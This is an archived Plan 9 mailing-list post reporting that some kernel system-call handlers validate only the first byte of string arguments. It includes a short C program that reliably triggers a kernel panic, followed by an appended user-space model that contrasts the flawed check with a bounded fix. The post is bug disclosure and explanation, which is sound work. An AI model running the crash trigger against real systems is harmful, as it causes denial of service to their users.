From mboxrd@z Thu Jan 1 00:00:00 1970
Date: Sat, 1 Aug 2009 17:01:26 -0400
From: Elizabeth Jones
To: 9fans@9fans.net
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
Subject: [9fans] Kernel crash bug
Topicbox-Message-UUID: 34780e4e-ead5-11e9-9d60-3106f5b1d025

There exist crash bugs in some of the system call handlers to do with
string validation; sometimes, only the first byte of an argument string
is validated. The following program reliably causes a kernel panic for
me:

#include <u.h>
#include <libc.h>

#define SEGBASE (char*)0x40000000
#define SEGSIZE 4096

int
main()
{
	/* attach a fresh segment; only its last byte gets written */
	segattach(0, "shared", SEGBASE, SEGSIZE);
	/* a non-NUL byte at the very top of the segment, so the "string"
	 * has no terminator inside mapped memory */
	*(char*)(SEGBASE + SEGSIZE - 1) = 'a';
	/* pass that byte as the path: the handler validates the first byte,
	 * then walks off the end of the segment */
	exec((char*)SEGBASE + SEGSIZE - 1, nil);
	return 0;
}

-- 
Elly
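The failure mode in the post, modelled in user space as an added example (this is not code from the post or from the Plan 9 kernel; the names validaddr, fetch, strlen_vuln and strlen_safe, the 8 KiB simulated address space and the single mapped segment are all assumptions made for the illustration). A string argument whose first byte is mapped but whose terminator is not is the case that matters: checking the first byte and then walking to the NUL reads unmapped memory inside the system call handler, while bounding the walk by the mapping turns the same input into an ordinary error return.

```c
/* Added example, not from the original post or the Plan 9 kernel.
 * A toy model of kernel-side string validation: the simulated address
 * space has one mapped segment, [SEG_BASE, SEG_BASE + SEG_SIZE), and
 * nothing else (assumed layout, chosen to mirror the segattach() in the
 * post). Reading an unmapped address stands in for the kernel fault. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MEM_SIZE 8192      /* simulated address space (assumed) */
#define SEG_BASE 4096      /* the one mapped segment (assumed) */
#define SEG_SIZE 4096

static unsigned char mem[MEM_SIZE];

/* Model of validaddr(): is [addr, addr+len) entirely inside the mapping? */
static int validaddr(uintptr_t addr, size_t len)
{
	return addr >= SEG_BASE && len <= SEG_SIZE
	    && addr + len <= SEG_BASE + SEG_SIZE;
}

/* Model of a byte fetch from user space: -1 means a fault on an unmapped
 * address, which in a system call handler is the panic from the post. */
static int fetch(uintptr_t addr)
{
	if (!validaddr(addr, 1))
		return -1;
	return mem[addr];
}

/* Vulnerable shape: validate only the first byte, then walk to the NUL.
 * Returns 0 on success, -1 for a clean bad-address error, -2 when the
 * walk leaves the mapping (the fault). */
static int strlen_vuln(uintptr_t s, size_t *outlen)
{
	size_t n = 0;
	int c;

	if (!validaddr(s, 1))
		return -1;          /* rejected cleanly, as intended */
	for (;;) {
		c = fetch(s + n);
		if (c < 0)
			return -2;      /* walked off the segment */
		if (c == 0)
			break;
		n++;
	}
	*outlen = n;
	return 0;
}

/* Hardened shape: compute how far the mapping extends from s and search
 * for the NUL only inside that range; an unterminated string becomes an
 * error to the caller instead of a fault in the kernel. */
static int strlen_safe(uintptr_t s, size_t *outlen)
{
	size_t avail;
	const unsigned char *nul;

	if (!validaddr(s, 1))
		return -1;
	avail = SEG_BASE + SEG_SIZE - s;      /* mapped bytes from s onward */
	nul = memchr(&mem[s], 0, avail);
	if (nul == NULL)
		return -1;          /* no terminator inside mapped memory */
	*outlen = (size_t)(nul - &mem[s]);
	return 0;
}

/* Constructed input 1: the trigger from the post, a lone non-NUL byte at
 * the top of the segment with nothing mapped after it. */
static void setup_trigger(void)
{
	memset(mem, 0, sizeof mem);
	mem[SEG_BASE + SEG_SIZE - 1] = 'a';
}

/* Constructed input 2: a properly terminated string at the segment base. */
static void setup_good(void)
{
	memset(mem, 0, sizeof mem);
	memcpy(&mem[SEG_BASE], "hello", 6);
}

int main(void)
{
	size_t n = 0;

	setup_trigger();
	printf("trigger: vuln=%d safe=%d\n",
	    strlen_vuln(SEG_BASE + SEG_SIZE - 1, &n),
	    strlen_safe(SEG_BASE + SEG_SIZE - 1, &n));
	setup_good();
	printf("good:    vuln=%d safe=%d len=%zu\n",
	    strlen_vuln(SEG_BASE, &n), strlen_safe(SEG_BASE, &n), n);
	return 0;
}
```

With the trigger input, strlen_vuln reports the walk leaving the mapping (-2, the modelled panic) while strlen_safe returns -1 to the caller; with the terminated string both succeed with length 5. A real kernel would bound the scan by page or segment mappings rather than by a single fixed segment, but the shape of the check is the same: the range that is searched must be the range that was validated.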